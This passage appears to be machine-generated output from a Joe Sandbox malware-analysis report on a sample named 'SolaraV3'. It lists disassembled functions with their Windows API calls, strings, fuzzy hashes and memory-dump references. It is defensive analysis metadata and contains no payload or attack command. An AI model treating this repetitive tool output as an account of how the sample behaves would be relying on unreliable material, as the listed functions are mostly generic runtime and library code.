Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindow
String ID: Service-0x$_OPENSSL_isservice
API String ID: 1944374717-1672312481
Opcode ID: d4d7f13fea52a3178e6bf5d964a5a64b36e3e8d5b416d224cb6cd8592f581902
Instruction ID: 35380a969acd4e47eaaf4ad6a0c34fdc5cf80d34214723a6076cc1bf981a4ab8
Opcode Fuzzy Hash: d4d7f13fea52a3178e6bf5d964a5a64b36e3e8d5b416d224cb6cd8592f581902
Instruction Fuzzy Hash: 644160A2605B8696EB609F34D840BA82394FF48774B44CB35EA7E867F4DF2CE5458340

Function 00007FF6DC70EA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF6DC70EA65

Part of subcall function 00007FF6DC70F9BC: __GetUnwindTryBlock.LIBCMT ref: 00007FF6DC70F9FF
Part of subcall function 00007FF6DC70F9BC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF6DC70FA24

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF6DC70EB3D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF6DC70ED8B
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6DC70EE98

Strings

csm, xrefs: 00007FF6DC70EB60
csm, xrefs: 00007FF6DC70EAE6
csm, xrefs: 00007FF6DC70EA7F

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction ID: 7d2efa3e56b21f8a086696df1f452fb08cc197e285ca4e21af46f31a94ce5cdf
Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction Fuzzy Hash: B6D18032A0874986EB20DF26D4413AD77B4FB55798F100136EE8D97B96DF3AE4A2D700

Function 00007FF6DC71ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF6DC71F0AA,?,?,000001FC22CA9F78,00007FF6DC71AD53,?,?,?,00007FF6DC71AC4A,?,?,?,00007FF6DC715F3E), ref: 00007FF6DC71EE8C
GetProcAddress.KERNEL32(?,?,?,00007FF6DC71F0AA,?,?,000001FC22CA9F78,00007FF6DC71AD53,?,?,?,00007FF6DC71AC4A,?,?,?,00007FF6DC715F3E), ref: 00007FF6DC71EE98

Strings

api-ms-, xrefs: 00007FF6DC71EDD6
ext-ms-, xrefs: 00007FF6DC71EDE9

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction ID: b95b587e12267ab634f70504cc74e22c2a31fd8b6b762ba04f6b51265cf1f776
Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction Fuzzy Hash: 8E412C61B1961A42FB26CB1A982467D63A5BF48BD0F885137DD1DC7384DF3CE42B8300

Function 00007FF6DC702C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DC703706,?,00007FF6DC703804), ref: 00007FF6DC702C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6DC703706,?,00007FF6DC703804), ref: 00007FF6DC702D63
MessageBoxW.USER32 ref: 00007FF6DC702D99

Strings

Error, xrefs: 00007FF6DC702D8C
<FormatMessageW failed.>, xrefs: 00007FF6DC702D70
%ls: , xrefs: 00007FF6DC702D22
[PYI-%d:ERROR] , xrefs: 00007FF6DC702CA6

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction ID: cfd60cbe75411257a8d0a185084403d822d742e250b1b9291541c7ddb6f9d44a
Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction Fuzzy Hash: C831D623708A4546E721AB26B8102AF66A1BF88799F410137EF4ED3B59DF3DD557C700

Function 00007FFB0B8160D2 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 227COMMON

Download Yara Rule

APIs

SwitchToFiber.KERNEL32 ref: 00007FFB0B8D35D4
CreateFiber.KERNEL32 ref: 00007FFB0B8D364C
SwitchToFiber.KERNEL32 ref: 00007FFB0B8D36C8
DeleteFiber.KERNEL32 ref: 00007FFB0B8D37AB

Strings

*, xrefs: 00007FFB0B8D350F
..\s\crypto\async\async.c, xrefs: 00007FFB0B8D34F1, 00007FFB0B8D3508, 00007FFB0B8D3550, 00007FFB0B8D3679, 00007FFB0B8D36E0, 00007FFB0B8D3760, 00007FFB0B8D3796, 00007FFB0B8D37B7, 00007FFB0B8D37E4

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: Fiber$Switch$CreateDelete
String ID: *$..\s\crypto\async\async.c
API String ID: 2050058302-1471988776
Opcode ID: 1e5013941710e139a7b14bb4f35b09f2f5b08f6e489bda408db967ad74f9ffa0
Instruction ID: 8e3d1ce40b541c81f05b0b17489462dee582d5459d2de3f5915451b579be3164
Opcode Fuzzy Hash: 1e5013941710e139a7b14bb4f35b09f2f5b08f6e489bda408db967ad74f9ffa0
Instruction Fuzzy Hash: 79A168B6A09B0286EA20DF36E450E6963A4FB54B84F04C436DA8F877B5EF3CE455C711

Function 00007FFB0B812E4B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32 ref: 00007FFB0B91EE72

Strings

~, xrefs: 00007FFB0B91EF3C
~, xrefs: 00007FFB0B91EF24
~, xrefs: 00007FFB0B91EEA7
~, xrefs: 00007FFB0B91EE8C
OPENSSL_ia32cap, xrefs: 00007FFB0B91EE48

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: EnvironmentVariable
String ID: OPENSSL_ia32cap$~$~$~$~
API String ID: 1431749950-1981414212
Opcode ID: 9eacd33310160f1931e422656a7230303f5cc1d66217712b0478dcc86fde18b9
Instruction ID: 5613ee4b77a52d6824f95ecc86086c2dd05565ab80572e3b150fdc758254b317
Opcode Fuzzy Hash: 9eacd33310160f1931e422656a7230303f5cc1d66217712b0478dcc86fde18b9
Instruction Fuzzy Hash: D5417AAAE0DA5396E7109B21E840AB463A0FB44B80F54C535ED5FCBBB4EF3DE4859700

Function 00007FF6DC70DCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF6DC70DF7A,?,?,?,00007FF6DC70DC6C,?,?,?,00007FF6DC70D869), ref: 00007FF6DC70DD4D
GetLastError.KERNEL32(?,?,?,00007FF6DC70DF7A,?,?,?,00007FF6DC70DC6C,?,?,?,00007FF6DC70D869), ref: 00007FF6DC70DD5B
LoadLibraryExW.KERNEL32(?,?,?,00007FF6DC70DF7A,?,?,?,00007FF6DC70DC6C,?,?,?,00007FF6DC70D869), ref: 00007FF6DC70DD85
FreeLibrary.KERNEL32(?,?,?,00007FF6DC70DF7A,?,?,?,00007FF6DC70DC6C,?,?,?,00007FF6DC70D869), ref: 00007FF6DC70DDF3
GetProcAddress.KERNEL32(?,?,?,00007FF6DC70DF7A,?,?,?,00007FF6DC70DC6C,?,?,?,00007FF6DC70D869), ref: 00007FF6DC70DDFF

Strings

api-ms-, xrefs: 00007FF6DC70DD6D

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction ID: e0a2312b60a5bac6d4238bef9f6bac598989c5c65bdd497a9777e53801983b32
Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction Fuzzy Hash: D9310521B1A74AD1EE229B03A4116BD63A4FF18BA0F494137ED1E87380DF3DE062D304

Function 00007FFB0B81377E Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 85COMMON

Download Yara Rule

APIs

00007FFB2ADB5630.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFB0B8B9C16

Strings

utf8only, xrefs: 00007FFB0B8B9C0C
pkix, xrefs: 00007FFB0B8B9BCF
nombstr, xrefs: 00007FFB0B8B9B8F
MASK:, xrefs: 00007FFB0B8B9B4A
default, xrefs: 00007FFB0B8B9C3A

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: 00007B5630
String ID: MASK:$default$nombstr$pkix$utf8only
API String ID: 2248877218-3483942737
Opcode ID: 932e197565b87e33d4723a3e589863ca2d8ca3d862467106704a9ed93825c48c
Instruction ID: 27b3910076cf3bdd421b4f26e244f64d29d98b1db07ea2a16119ea8e40f722a4
Opcode Fuzzy Hash: 932e197565b87e33d4723a3e589863ca2d8ca3d862467106704a9ed93825c48c
Instruction Fuzzy Hash: A431A0A2A1868186EB518B38E550FB937A0FF45750F849132EB5F876B1EE2CE495C700

Function 00007FF6DC702A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6DC70351A,?,00000000,00007FF6DC703F1B), ref: 00007FF6DC702AA0

Strings

Warning, xrefs: 00007FF6DC702B1E
0, xrefs: 00007FF6DC702B16
Warning [ANSI Fallback], xrefs: 00007FF6DC702B0F
[PYI-%d:%s] , xrefs: 00007FF6DC702AA8
WARNING, xrefs: 00007FF6DC702AAF

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction ID: 99a65243a18f80446305b0d7d622b58de2353c1983ade51469d38b1ea24c56d3
Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction Fuzzy Hash: FF21B272A18B8542E7209B55F8517EAA3A4FB883C4F400137FE8D83659DF3CD1568740

Function 00007FF6DC708570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6DC708590
OpenProcessToken.ADVAPI32 ref: 00007FF6DC7085A3
GetTokenInformation.ADVAPI32 ref: 00007FF6DC7085C8
GetLastError.KERNEL32 ref: 00007FF6DC7085D2
GetTokenInformation.ADVAPI32 ref: 00007FF6DC708612
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6DC70862E
CloseHandle.KERNEL32 ref: 00007FF6DC708646

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: f75ab0f0843ea553283f31270fa2e47dd05c34398218a1d4d57149fb78d89f01
Instruction ID: 7dcb2c5d61f5f7b020b30dc55f8cc9d1aceded58e25c981b5d6252f48f0b925e
Opcode Fuzzy Hash: f75ab0f0843ea553283f31270fa2e47dd05c34398218a1d4d57149fb78d89f01
Instruction Fuzzy Hash: 88215E31A0C64A42EB208B56F55426EE3B0FF857A0F540336EA6D83BE9DE7DD4668700

Function 00007FF6DC71B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6DC71B15F
FlsGetValue.KERNEL32 ref: 00007FF6DC71B174
FlsSetValue.KERNEL32 ref: 00007FF6DC71B195
FlsSetValue.KERNEL32 ref: 00007FF6DC71B1C2
FlsSetValue.KERNEL32 ref: 00007FF6DC71B1D3
FlsSetValue.KERNEL32 ref: 00007FF6DC71B1E4
SetLastError.KERNEL32 ref: 00007FF6DC71B1FF

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
Instruction ID: 5d33a0b0013c490226e7d7751f4eb25a233001fb05fab278941ab6e8e72b7e22
Opcode Fuzzy Hash: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
Instruction Fuzzy Hash: CA219D30F0C64A86FA6963399A7113DA2425F447F0F116736E93EC7AC6DE2CB4639300

Function 00007FF6DC727D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF6DC727D9D
GetLastError.KERNEL32 ref: 00007FF6DC727DA9
CloseHandle.KERNEL32 ref: 00007FF6DC727DC1
CreateFileW.KERNEL32 ref: 00007FF6DC727DEC
WriteConsoleW.KERNEL32 ref: 00007FF6DC727E0B

Strings

CONOUT$, xrefs: 00007FF6DC727DCD

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction ID: e0eb0081e8cb1c4685abdfb09c0e79dca2cc258b0cd8ac2bead7fa3454d9d654
Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction Fuzzy Hash: E211B921B18B4986E7608B52F85532DA3A0FB88FE4F044235E96EC7794DF3CD8258740

Function 00007FF6DC708ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC708EFD
K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC708F5A

Part of subcall function 00007FF6DC709390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6DC7045F4,00000000,00007FF6DC701985), ref: 00007FF6DC7093C9

K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC708FE5
K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC709044
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC709055
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF6DC703FA9), ref: 00007FF6DC70906A

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: b9812aa4a412ff6f242132f81c88a7c8c76a4ef9029947ab8fd2a45bc25d6007
